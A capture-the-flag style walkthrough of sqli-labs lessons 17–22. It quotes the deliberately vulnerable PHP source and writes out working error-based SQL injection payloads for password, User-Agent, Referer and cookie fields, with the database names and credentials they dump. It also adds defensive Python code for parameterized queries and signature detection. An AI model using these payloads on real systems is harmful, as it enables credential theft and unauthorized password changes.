Less-17 POST-Update Query-Error Based-String
Error-based POST string injection in an UPDATE query
Test
The page shows PASSWORD RESET.
uname=test&passwd=test2 returns a page saying the reset failed.
uname=admin&passwd=test2 returns a page saying the password was reset successfully.
So a correct username alone appears to be enough to reset the password.
Page source
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
function check_input($value)
{
if(!empty($value))
{
// truncation (see comments)
$value = substr($value,0,15);
}
// Stripslashes if magic quotes enabled
if (get_magic_quotes_gpc())
{
$value = stripslashes($value);
}
// Quote if not a number
if (!ctype_digit($value))
{
$value = "'" . mysql_real_escape_string($value) . "'";
}
else
{
$value = intval($value);
}
return $value;
}
// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
//making sure uname is not injectable
$uname=check_input($_POST['uname']);
$passwd=$_POST['passwd'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'User Name:'.$uname."\n");
fwrite($fp,'New Password:'.$passwd."\n");
fclose($fp);
// connectivity
@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
//echo $row;
if($row)
{
//echo '<font color= "#0000ff">';
$row1 = $row['username'];
//echo 'Your Login name:'. $row1;
$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
mysql_query($update);
echo "<br>";
if (mysql_error())
{
echo '<font color= "#FFFF00" font size = 3 >';
print_r(mysql_error());
echo "</br></br>";
echo "</font>";
}
else
{
echo '<font color= "#FFFF00" font size = 3 >';
//echo " You password has been successfully updated " ;
echo "<br>";
echo "</font>";
}
echo '<img src="../images/flag1.jpg" />';
//echo 'Your Password:' .$row['password'];
echo "</font>";
}
else
{
echo '<font size="4.5" color="#FFFF00">';
//echo "Bug off you Silly Dumb hacker";
echo "</br>";
echo '<img src="../images/slap1.jpg" />';
echo "</font>";
}
}
?>
Source code analysis
A check_input function is defined for the username: the value must not be empty and is truncated to 15 characters if longer; if magic quotes are enabled, backslashes are stripped (a pair of backslashes becomes one); then a digit check: a non-numeric value is escaped with mysql_real_escape_string and wrapped in quotes, while a pure number is converted to int and returned. Only the username goes through this function, and the SQL statement only checks that the user exists, without checking the corresponding password:
SELECT username, password FROM users WHERE username= $uname LIMIT 0,1
If the update succeeds the page returns an image containing "success"; if it fails it returns the failure image.
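To show what the fix for the reset flow analysed above looks like, here is an added example (not part of the original page or of sqli-labs) that rebuilds the Less-17 logic on an in-memory sqlite3 table, assumed as a stand-in for the lab's MySQL users table: the vulnerable form concatenates the new password and the looked-up username into the UPDATE exactly as the PHP does, while the hardened form binds both as parameters.

```python
import sqlite3

# Constructed in-memory stand-in for the lab's `users` table (sqlite3 here, MySQL in the lab).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("Dumb", "Dumb"), ("Angelina", "I-kill-you"), ("admin", "admin")])
    conn.commit()
    return conn

def reset_password_vulnerable(conn, uname, passwd):
    """Same shape as Less-17: the username lookup is escaped, but the new password and the
    username read back from the table are concatenated into the UPDATE unescaped."""
    row = conn.execute("SELECT username FROM users WHERE username = ? LIMIT 1", (uname,)).fetchone()
    if row is None:
        return False                      # no such user: the lab shows the failure image here
    conn.execute(f"UPDATE users SET password = '{passwd}' WHERE username='{row[0]}'")
    conn.commit()
    return True

def reset_password_safe(conn, uname, passwd):
    """Hardened form: both statements bind their values, so quotes in passwd stay data."""
    row = conn.execute("SELECT username FROM users WHERE username = ? LIMIT 1", (uname,)).fetchone()
    if row is None:
        return False
    conn.execute("UPDATE users SET password = ? WHERE username = ?", (passwd, row[0]))
    conn.commit()
    return True

def passwords(conn):
    """Snapshot of username -> stored password, used to see what each reset actually changed."""
    return dict(conn.execute("SELECT username, password FROM users"))

if __name__ == "__main__":
    probe = "a'"                          # the single-quote probe the walkthrough uses
    try:
        reset_password_vulnerable(make_db(), "admin", probe)
    except sqlite3.OperationalError as err:
        print("vulnerable:", err)         # the kind of syntax error Less-17 echoes via mysql_error()
    conn = make_db()
    reset_password_safe(conn, "admin", probe)
    print("safe:", passwords(conn))       # the quote is stored literally, other rows untouched
```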
Payload
Following references online, there are three ways to inject SQL into UPDATE, INSERT and DELETE statements.
1. Subquery injection
Subquery injection is the double-query injection described earlier (see Less-5 for details).
uname=admin&passwd=' or (select 1 from(select count(*),concat((select concat(0x7e,0x27,database(),0x27,0x7e)),floor(rand()*2))x from information_schema.tables group by x)a) where username='admin' %23
Returns: Duplicate entry '~'security'~0' for key 'group_key'
Getting the tables
uname=admin&passwd=' or (select 1 from(select count(*),concat((select table_name from information_schema.tables where table_schema='security' limit 0,1),floor(rand()*2))x from information_schema.tables group by x)a) where username='admin' %23
Column names
uname=admin&passwd=' or (select 1 from(select count(*),concat((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),floor(rand()*2))x from information_schema.tables group by x)a) where username='admin'%23
Getting user information
uname=admin&passwd=' or (select 1 from(select count(*),concat((select concat(0x27,id,0x7e,username,0x7e,password,0x27) from users limit 0,1),floor(rand()*2))x from information_schema.tables group by x)a) where username='admin'%23
Returns: Duplicate entry ''1~Dumb~Dumb'1' for key 'group_key'
2. Via name_const():
name_const(name,value): returns the given value. When used to produce a result-set column, NAME_CONST() gives that column the given name. The arguments should be constants. This works on older versions.
uname=admin&passwd=1' or (select * from (select(name_const(database(),1)),name_const(database(),1))a) where username='admin'%23
Error: Incorrect arguments to NAME_CONST; the database version is too new for this.
Fixed form (the same structure applies to UPDATE, INSERT and DELETE):
... or (select * from(select name_const((select ...),1),name_const((select...),1))a) ...
3. Via updatexml()
payload: updatexml(1,concat(0x7e,(version())),0)
The updatexml(xml_target,xpath_expr,new_xml) function:
First argument: XML_document, a string naming the XML document object (called Doc in the documentation)
Second argument: XPath_string (a string in XPath format)
Third argument: new_value, a string that replaces the matching data found
Effect: changes the value of the nodes in XML_document that match XPath_string
Here we only need to make the second argument throw an error. Since the first parameter (uname) is filtered and checked, the injection goes into the passwd field.
Payload
uname=admin&passwd=a' or updatexml(1,concat(0x2b,version(),0x2b),1) %23
Returns: XPATH syntax error: '+5.5.53+'
uname=admin&passwd=a' or updatexml(1,concat(0x2b,database(),0x2b),1) %23
Returns: XPATH syntax error: '+security+'
uname=admin&passwd=a' or updatexml(1,concat(0x2b,(select group_concat(schema_name) from information_schema.schemata),0x2b),1) %23
Returns: XPATH syntax error: '+information_schema,challenges,m' (only part of the information is returned here)
Getting database names
uname=admin&passwd=a' or updatexml(1,concat(0x2b,(select schema_name from information_schema.schemata limit 0,1),0x2b),1) %23
Returns: XPATH syntax error: '+information_schema+'
Getting table names
uname=admin&passwd=a' or updatexml(1,concat(0x2b,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x2b),1) %23
Returns: XPATH syntax error: '+emails+'
Getting column names
uname=admin&passwd=a' or updatexml(1,concat(0x2b,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x2b),1) %23
Returns: XPATH syntax error: '+id+'
Getting user information:
1. Double-query injection
uname=admin&passwd=' or updatexml(1,concat(0x7e,(select * from(select concat_ws(char(32,44,32),id,username,password) from users limit 7,1)a),0x7e),0)#
Returns: XPATH syntax error: '~8 , admin , admin~'
Note that the earlier UPDATE operations may have cleared some of the passwords in the database.
4. extractvalue()
EXTRACTVALUE (XML_document, XPath_string);
First argument: XML_document, a string naming the XML document object
Second argument: XPath_string (a string in XPath format)
Effect: returns a string containing the queried value from the target XML
Its use is similar to updatexml().
Payload
uname=admin&passwd=a' or extractvalue(1,concat(0x2b,version(),0x2b)) %23
Returns: XPATH syntax error: '+5.5.53+'
uname=admin&passwd=a' or extractvalue(1,concat(0x2b,database(),0x2b)) %23
Returns: XPATH syntax error: '+security+'
Getting database names
uname=admin&passwd=a' or extractvalue(1,concat(0x2b,(select schema_name from information_schema.schemata limit 0,1) ,0x2b)) %23
Returns: XPATH syntax error: '+information_schema+'
The rest is similar to updatexml().
Less-18 POST-Header Injection-Uagent field-Error based
Error-based POST injection in the User-Agent header
Test
Opening the page shows the IP address:
Your IP ADDRESS is: 192.168.83.140
Testing the POST parameters produces no reaction at all.
Looking at the source code
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
function check_input($value)
{
if(!empty($value))
{
// truncation (see comments)
$value = substr($value,0,20);
}
// Stripslashes if magic quotes enabled
if (get_magic_quotes_gpc())
{
$value = stripslashes($value);
}
// Quote if not a number
if (!ctype_digit($value))
{
$value = "'" . mysql_real_escape_string($value) . "'";
}
else
{
$value = intval($value);
}
return $value;
}
$uagent = $_SERVER['HTTP_USER_AGENT'];
$IP = $_SERVER['REMOTE_ADDR'];
echo "<br>";
echo 'Your IP ADDRESS is: ' .$IP;
echo "<br>";
//echo 'Your User Agent is: ' .$uagent;
// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
/*
echo 'Your Your User name:'. $uname;
echo "<br>";
echo 'Your Password:'. $passwd;
echo "<br>";
echo 'Your User Agent String:'. $uagent;
echo "<br>";
echo 'Your User Agent String:'. $IP;
*/
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'User Agent:'.$uname."\n");
fclose($fp);
$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
if($row1)
{
echo '<font color= "#FFFF00" font size = 3 >';
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
mysql_query($insert);
//echo 'Your IP ADDRESS is: ' .$IP;
echo "</font>";
//echo "<br>";
echo '<font color= "#0000ff" font size = 3 >';
echo 'Your User Agent is: ' .$uagent;
echo "</font>";
echo "<br>";
print_r(mysql_error());
echo "<br><br>";
echo '<img src="../images/flag.jpg" />';
echo "<br>";
}
else
{
echo '<font color= "#0000ff" font size="3">';
//echo "Try again looser";
print_r(mysql_error());
echo "</br>";
echo "</br>";
echo '<img src="../images/slap.jpg" />';
echo "</font>";
}
}
?>
The page first echoes the IP address of the client logging in. Both parameters (uname and passwd) are checked and filtered, which is why the tests above showed nothing. The SQL statement verifies that the account and password match; only when both are correct does the next step run, so the testing here assumes an account has already been registered. After a successful login, the script inserts the user agent, IP address and username into the security.uagents table and then echoes the user agent; if the login fails, the error is printed.
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)"
Test
uname=admin&passwd=admin
Returns:
Your IP ADDRESS is: 192.168.83.140
Your User Agent is: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0
Since username and password are filtered, we turn to injection tests on uagent and ip_address, which are not filtered.
Testing with Burp Suite's Repeater
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0'
Returns:
near '192.168.83.140', 'admin')' at line 1
Analysis: the value is wrapped in single quotes, and the statement ends with a closing parenthesis.
Construct the payload
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0',1,2)#
Returns normally:
Your User Agent is: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0',1,2)#
Try appending a query at the end:
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0',(select database()),2)#
This does not return the information we want.
Injecting with updatexml()
Version number
'or updatexml(1,concat(0x2b,version(),0x2b),1))#
Returns: XPATH syntax error: '+5.5.53+'
Current database name
'or updatexml(1,concat(0x2b,database(),0x2b),1))#
XPATH syntax error: '+security+'
All database names
'or updatexml(1,concat(0x2b,(select schema_name from information_schema.schemata limit 0,1),0x2b),1))#
XPATH syntax error: '+information_schema+'
Table names
'or updatexml(1,concat(0x2b,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x2b),1))#
XPATH syntax error: '+emails+'
Column names
'or updatexml(1,concat(0x2b,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x2b),1))#
XPATH syntax error: '+id+'
XPATH syntax error: '+username+'
XPATH syntax error: '+password+'
Getting account information
'or updatexml(1,concat(0x2b,(select group_concat(username,password) from security.users limit 0,1),0x2b),1))#
XPATH syntax error: '+DumbDumb,AngelinaI-kill-you,Dum'
extractvalue() works here as well; note that it takes two arguments:
'or extractvalue(1,concat(0x2b,(select group_concat(username,password) from security.users limit 0,1),0x2b)))#
XPATH syntax error: '+DumbDumb,AngelinaI-kill-you,Dum'
Less-19 POST-Header Injection-Referer field-Error based
Error-based POST injection in the Referer header
Analysis
This is similar to Less-18, except that the injection point is now the Referer. Log in with the known account and password:
uname=admin&passwd=admin
Your IP ADDRESS is: 192.168.83.140
Your Referer is:
The Burp Suite capture is as follows:
POST /sqli-labs/Less-19/ HTTP/1.1
Host: 192.168.83.141
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Forwarded-For: 123.232.23.245
CLTENT-IP: 123.232.23.245
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
uname=admin&passwd=admin
We can see that the request above carries no Referer.
Using HackBar or Burp Suite,
add it directly to the request:
Referer: https://localhost/sql-labs/Less-19'or updatexml(1,concat(0x2b,version(),0x2b),1))#
XPATH syntax error: '+5.5.53+'
The rest is the same as above.
I ran into some trouble when testing with HackBar: the comment symbols # and -- never took effect. After capturing the request I found that the # comment was gone; the -- was still there but did not work. Using %23 instead solved it, so this is an encoding issue.
Less-20 POST-Cookie injection-Uagent field-error based
Error-based POST injection in the Cookie header
Test
uname=admin&passwd=admin
Returns:
YOUR USER AGENT IS : Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0
YOUR IP ADDRESS IS : 192.168.83.140
DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE
YOUR COOKIE : uname = admin and expires: Thu 26 Apr 2018 - 02:45:27
Your Login name:admin
Your Password:admin
Your ID:8
Some key information is displayed here.
Note the button below, Delete Your Cookie!; clicking it redirects straight to the login page, so we can infer there is a process that operates on the cookie.
Burp Suite capture of the delete-cookie request:
POST /sqli-labs/Less-20/index.php HTTP/1.1
Host: 192.168.83.141
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.83.141/sqli-labs/Less-20/index.php
Cookie: uname=admin
X-Forwarded-For: 123.232.23.245
CLTENT-IP: 123.232.23.245
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 28
submit=Delete+Your+Cookie%21
Source code
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
if(!isset($_COOKIE['uname']))
{
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
echo "<div style=' margin-top:20px;color:#FFF; font-size:24px; text-align:center'> Welcome <font color='#FF0000'> Dhakkan </font><br></div>";
echo "<div align='center' style='margin:20px 0px 0px 510px;border:20px; background-color:#0CF; text-align:center;width:400px; height:150px;'>";
echo "<div style='padding-top:10px; font-size:15px;'>";
echo "<!--Form to post the contents -->";
echo '<form action=" " name="form1" method="post">';
echo ' <div style="margin-top:15px; height:30px;">Username : ';
echo ' <input type="text" name="uname" value=""/> </div>';
echo ' <div> Password : ';
echo ' <input type="text" name="passwd" value=""/></div></br>';
echo ' <div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div>';
echo '</form>';
echo '</div>';
echo '</div>';
echo '<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">';
echo '<font size="3" color="#FFFF00">';
echo '<center><br><br><br>';
echo '<img src="../images/Less-20.jpg" />';
echo '</center>';
function check_input($value)
{
if(!empty($value))
{
$value = substr($value,0,20); // truncation (see comments)
}
if (get_magic_quotes_gpc()) // Stripslashes if magic quotes enabled
{
$value = stripslashes($value);
}
if (!ctype_digit($value)) // Quote if not a number
{
$value = "'" . mysql_real_escape_string($value) . "'";
}
else
{
$value = intval($value);
}
return $value;
}
echo "<br>";
echo "<br>";
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
$cookee = $row1['username'];
if($row1)
{
echo '<font color= "#FFFF00" font size = 3 >';
setcookie('uname', $cookee, time()+3600);
header ('Location: index.php');
echo "I LOVE YOU COOKIES";
echo "</font>";
echo '<font color= "#0000ff" font size = 3 >';
//echo 'Your Cookie is: ' .$cookee;
echo "</font>";
echo "<br>";
print_r(mysql_error());
echo "<br><br>";
echo '<img src="../images/flag.jpg" />';
echo "<br>";
}
else
{
echo '<font color= "#0000ff" font size="3">';
//echo "Try again looser";
print_r(mysql_error());
echo "</br>";
echo "</br>";
echo '<img src="../images/slap.jpg" />';
echo "</font>";
}
}
echo "</font>";
echo '</font>';
echo '</div>';
}
else
{
if(!isset($_POST['submit']))
{
$cookee = $_COOKIE['uname'];
$format = 'D d M Y - H:i:s';
$timestamp = time() + 3600;
echo "<center>";
echo '<br><br><br>';
echo '<img src="../images/Less-20.jpg" />';
echo "<br><br><b>";
echo '<br><font color= "red" font size="4">';
echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];
echo "</font><br>";
echo '<font color= "cyan" font size="4">';
echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];
echo "</font><br>";
echo '<font color= "#FFFF00" font size = 4 >';
echo "DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE <br>";
echo '<font color= "orange" font size = 5 >';
echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);
echo "<br></font>";
$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
$result=mysql_query($sql);
if (!$result)
{
die('Issue with your mysql: ' . mysql_error());
}
$row = mysql_fetch_array($result);
if($row)
{
echo '<font color= "pink" font size="5">';
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo '<font color= "grey" font size="5">';
echo 'Your Password:' .$row['password'];
echo "</font></b>";
echo "<br>";
echo 'Your ID:' .$row['id'];
}
else
{
echo "<center>";
echo '<br><br><br>';
echo '<img src="../images/slap1.jpg" />';
echo "<br><br><b>";
//echo '<img src="../images/Less-20.jpg" />';
}
echo '<center>';
echo '<form action="" method="post">';
echo '<input type="submit" name="submit" value="Delete Your Cookie!" />';
echo '</form>';
echo '</center>';
}
else
{
echo '<center>';
echo "<br>";
echo "<br>";
echo "<br>";
echo "<br>";
echo "<br>";
echo "<br>";
echo '<font color= "#FFFF00" font size = 6 >';
echo " Your Cookie is deleted";
setcookie('uname', $row1['username'], time()-3600);
header ('Location: index.php');
echo '</font></center></br>';
}
echo "<br>";
echo "<br>";
//header ('Location: main.php');
echo "<br>";
echo "<br>";
//echo '<img src="../images/slap.jpg" /></center>';
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'Cookie:'.$cookee."\n");
fclose($fp);
}
?>
Analysis
1. Check whether the cookie exists; if not, perform login validation.
2. On login, uname and passwd are filtered first and then validated; the variable $cookee is set to the username, and the cookie uname is set to it with an expiry of time()+3600.
3. If the submit button has not been clicked, detailed information is shown, including the user agent, IP and cookie; the account and password matching the cookie are queried and displayed.
4. If the submit button was clicked, the cookie is reset and the page redirects to the login page.
Key code: the user matching the cookie is queried, and the variable $cookee is not filtered, even though its value is passed in from username:
$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
Payload
Test by adding a single quote
Cookie: uname=admin'
Returns: near ''admin'' LIMIT 0,1' at line 1, so the value is wrapped in single quotes.
admin'or 1=1# returns normally
Enumerating database names
admin'or updatexml(1,concat(0x2b,(select schema_name from information_schema.schemata limit 0,1),0x2b),1)#
XPATH syntax error: '+information_schema+'
The rest is the same as above.
Less-21 Cookie Injection- Error Based- complex - string
Less-21 differs from Less-20 in that the cookie value uname is base64-encoded:
setcookie('uname', base64_encode($row1['username']), time()+3600);
Test
uname=admin' after base64 encoding:
uname=YWRtaW4n
near ''admin'') LIMIT 0,1' at line 1
We can see the value is wrapped in single quotes and a parenthesis.
admin' or 1=1)#
YWRtaW4nIG9yIDE9MSkj returns normally
Construct the payload
Enumerating system database names
admin' or updatexml(1,concat(0x2b,(select schema_name from information_schema.schemata limit 0,1),0x2b),1))#
YWRtaW4nIG9yIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDJiLChzZWxlY3Qgc2NoZW1hX25hbWUgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuc2NoZW1hdGEgbGltaXQgMCwxKSwweDJiKSwxKSkj
Returns: XPATH syntax error: '+information_schema+'
The rest is the same as above.
Less-22 Cookie Injection- Error Based- Double Quotes - string
Test
uname=admin'
uname=YWRtaW4n
No error
admin"
YWRtaW4i
near '"admin"" LIMIT 0,1' at line 1
Wrapped in double quotes
admin" or 1=1#
YWRtaW4iIG9yIDE9MSM= returns normally
Construct the payload
admin" or updatexml(1,concat(0x2b,(select schema_name from information_schema.schemata limit 0,1),0x2b),1)#
YWRtaW4iIG9yIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDJiLChzZWxlY3Qgc2NoZW1hX25hbWUgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuc2NoZW1hdGEgbGltaXQgMCwxKSwweDJiKSwxKSM=
XPATH syntax error: '+information_schema+'
The rest is the same as above.
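As an added example (not from the original page or from sqli-labs), a small Python detector for the header and cookie injection points used in Less-18 through Less-22: it parses a raw request like the Burp captures above, base64-decodes cookie values the way Less-21/22 encode them, and flags the error-based signatures the walkthrough relies on (updatexml, extractvalue, name_const, a quote followed by or, a trailing comment). The sample requests are constructed here; the Less-21 cookie value is the one from the walkthrough.

```python
import base64
import re

# Signatures of the error-based techniques used in Less-18 to Less-22, matched after decoding.
SIGNATURES = {
    "updatexml": re.compile(r"updatexml\s*\(", re.I),
    "extractvalue": re.compile(r"extractvalue\s*\(", re.I),
    "name_const": re.compile(r"name_const\s*\(", re.I),
    "quote_or": re.compile(r"['\"]\s*or\b", re.I),
    "comment_terminator": re.compile(r"(#|--|%23)\s*$"),
}

def parse_request(raw):
    """Split a raw HTTP request (as captured in Burp) into a lower-cased header dict."""
    head = raw.partition("\r\n\r\n")[0]
    headers = {}
    for line in head.splitlines()[1:]:          # skip the request line
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers

def cookie_views(cookie):
    """Yield each cookie value as sent and, where it is valid base64 text, decoded (Less-21/22)."""
    for part in cookie.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            yield name, value
            try:
                yield name + " (base64-decoded)", base64.b64decode(value, validate=True).decode()
            except (ValueError, UnicodeDecodeError):
                pass                            # not base64: the raw value was already yielded

def scan_request(raw):
    """Return (location, signature) pairs for every header field that matches a signature."""
    headers = parse_request(raw)
    fields = []
    for name in ("user-agent", "referer", "cookie"):
        if name == "cookie" and name in headers:
            fields.extend((f"cookie:{k}", v) for k, v in cookie_views(headers[name]))
        elif name in headers:
            fields.append((name, headers[name]))
    return [(where, sig) for where, value in fields
            for sig, rx in SIGNATURES.items() if rx.search(value)]

# Constructed requests modelled on the captures above (the Less-21 cookie is the page's own value).
UA = "Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0"
LESS18 = ("POST /sqli-labs/Less-18/ HTTP/1.1\r\nHost: 192.168.83.141\r\nUser-Agent: " + UA +
          "'or updatexml(1,concat(0x2b,version(),0x2b),1))#\r\n\r\nuname=admin&passwd=admin")
LESS21 = ("POST /sqli-labs/Less-21/ HTTP/1.1\r\nHost: 192.168.83.141\r\nUser-Agent: " + UA +
          "\r\nCookie: uname=YWRtaW4nIG9yIDE9MSkj\r\n\r\n")
BENIGN = ("POST /sqli-labs/Less-20/index.php HTTP/1.1\r\nHost: 192.168.83.141\r\nUser-Agent: " + UA +
          "\r\nReferer: http://192.168.83.141/sqli-labs/Less-20/index.php\r\nCookie: uname=admin"
          "\r\n\r\nsubmit=Delete+Your+Cookie%21")
```

The same signatures are what an application should never see echoed back: the mysql_error() output printed in every lesson above is what turns these probes into a working oracle, so suppressing database errors in responses removes the error-based channel even before the queries are parameterized.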